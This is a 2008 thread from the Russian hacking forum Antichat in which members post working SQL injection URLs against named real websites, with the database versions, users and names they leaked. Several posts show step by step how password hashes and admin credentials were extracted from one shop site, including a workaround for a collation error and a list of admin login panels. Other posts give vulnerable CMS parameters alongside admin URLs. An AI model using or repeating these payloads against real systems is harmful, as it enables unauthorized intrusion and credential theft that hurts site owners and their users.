ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6741  
Старый 26.10.2008, 16:52
Аватар для cash$$$
cash$$$
Banned
Регистрация: 06.01.2008
Сообщений: 413
Провел на форуме:
1301036

Репутация: 1334
Отправить сообщение для cash$$$ с помощью ICQ
По умолчанию

Magazine

Код:
http://online-market.com.ua/stat_info.php?id=99999+union+select+1,version(),3,4/*
version: 5.0.41-community-log
user: onlinem_user@localhost
database: onlinem_base

Код:
http://www.fangoria.com/fearful_feature.php?id=99999'+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15/*
version: 5.0.22
user: fango_site@localhost
database: joesena_fangoria

Онлайн аукционы

Код:
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,version(),4,5,6,7/*
version: 5.0.45-log
user: u72447@10.10.153.176
database: u72447

Код:
http://www.elcom.md/news.php?id=99999+union+select+1,2,version(),4,5,6,7/*
version: 5.0.27
user: 17325@localhost
database: 17325
 
Ответить с цитированием

  #6742  
Старый 26.10.2008, 16:57
Аватар для bons
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию

тИЦ = 750

Код:
http://rezonans.info/index.php?p=news&nID=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
version() - 5.0.45
database() - admin_smi
user() - admin_smi@localhost

--------------------------------------------
тИЦ = 230

Код:
http://www.womanineurope.com/beauty/show_fashion.php?cat=news&fnr=-1+union+select+1,version(),user(),4,5,database(),7/*
version() - 4.0.27-max-log
database() - db125240836
user() - dbo125240836@212.227.118.27

--------------------------------------------
Код:
http://www.michiganbusiness.us/showcompany.php?id=-1%0Aunion%0Aselect%0A1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--
version() - 4.0.27-standard
user() - michigan_michiga@localhost
database() - michigan_mbusiness

Последний раз редактировалось bons; 26.10.2008 в 16:59..
 
Ответить с цитированием

  #6743  
Старый 26.10.2008, 17:37
Аватар для Sleep
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
По умолчанию

Код:
http://www.grably.ru/restaurants?id=9999+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,0,1,2,3,4,5,6+from+INFORMATION_SCHEMA.TABLES--
Код:
http://www.specialradio.ru/mkz/?id=-1+union+select+1,version(),3,user(),5,6,7,8,9--
 
Ответить с цитированием

  #6744  
Старый 26.10.2008, 18:25
Аватар для $p01nt
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию

Цитрус

Компания по разработке сайтов. Уязвимость в их CMS.
Пример:
Цитата:
http://www.citrus-soft.ru/chapter.php?id_chapter=76'&from=m
Панель администратора:
Цитата:
http://www.citrus-soft.ru/admin/login.php
КирИТас

Компания по разработке сайтов.Уязвимость в CMS на сайте.
Пример:
Цитата:
http://www.ciritas.ru/product.php?id=15'
Панель администратора:
Цитата:
http://www.ciritas.ru/admin/login.php

Последний раз редактировалось $p01nt; 26.10.2008 в 19:18..
 
Ответить с цитированием

  #6745  
Старый 26.10.2008, 18:26
Аватар для foopi
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527

Репутация: 62
Отправить сообщение для foopi с помощью ICQ
По умолчанию

У меня такая проблема - когда ввожу такую строку
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,passwor d,4,5,6,7+from+members
выдаёт вот такую ошибку - Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_swedish_ci,IMPLICIT) for operation 'UNION'
ОДнако на такой запрос
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,id,4,5, 6,7+from+members - реагирует нормально. может быть кто-нибудь знает как эту фигню обойти??
 
Ответить с цитированием

  #6746  
Старый 26.10.2008, 19:02
Аватар для foopi
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527

Репутация: 62
Отправить сообщение для foopi с помощью ICQ
По умолчанию

проблему решил!гугл помог. Если кому интересно , составил такой запрос
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,convert (password+using+cp1251),4,5,6,7+from+members на что получил хэши пользователей)
 
Ответить с цитированием

  #6747  
Старый 26.10.2008, 22:12
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

foopi
Цитата:
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,unhex(h ex(concat_ws(0x3a,table_name,table_schema))),4,5,6 ,7+from+information_schema.columns+where+column_na me+like+char(112,97,115,%20115,119,111,114,100)+li mit+7,1
tables with passwords
Цитата:
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,3,unhex (hex(password)),5,6,7+from+u72447_maillist.phplist _admin+limit+0,1
http://bestwayusa.ru/maillist/admin/?page=configure
Цитата:
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,unhex(h ex(concat_ws(0x3a,name,password))),4,5,6,7+from+u7 2447_2.chat_admin+limit+0,1
http://bestwayusa.ru/chatlive/admin
Цитата:
http://bestwayusa.ru/show_artical.php?id=99999+union+select+1,2,unhex(h ex(username)),unhex(hex(password)),5,6,7+from+deal ers+limit+0,1
http://bestwayusa.ru/dealer_login.php

http://bestwayusa.ru/admin.php

didnt find password in db

Последний раз редактировалось sabe; 26.10.2008 в 22:29..
 
Ответить с цитированием

  #6748  
Старый 27.10.2008, 01:15
Аватар для foopi
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527

Репутация: 62
Отправить сообщение для foopi с помощью ICQ
По умолчанию

Цитата:
Сообщение от sabe  
foopi

tables with passwords

http://bestwayusa.ru/maillist/admin/?page=configure

http://bestwayusa.ru/chatlive/admin

http://bestwayusa.ru/dealer_login.php

http://bestwayusa.ru/admin.php

didnt find password in db

Только я одного не могу понять ты эти ссылки сам находиш или через скулю узнаёшь??
 
Ответить с цитированием

  #6749  
Старый 27.10.2008, 02:18
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

foopi
сам) что там находить то ? по сайту 5 мин полазить ?
 
Ответить с цитированием

  #6750  
Старый 27.10.2008, 05:52
Аватар для Sleep
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
По умолчанию

Код:
http://www.sil.org/silepubs/abstract.asp?id=1%27+or+1=@@VERSION--
таблицы:
Код:
'dtproperties','bibliography','CountriesList','Country_Index','Language_Index','LanguagesList','name_index','Serials_Index','Serials_List','SIL_Epubs','subject_code_categories','Subject_index','sysconstraints','syssegments'
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ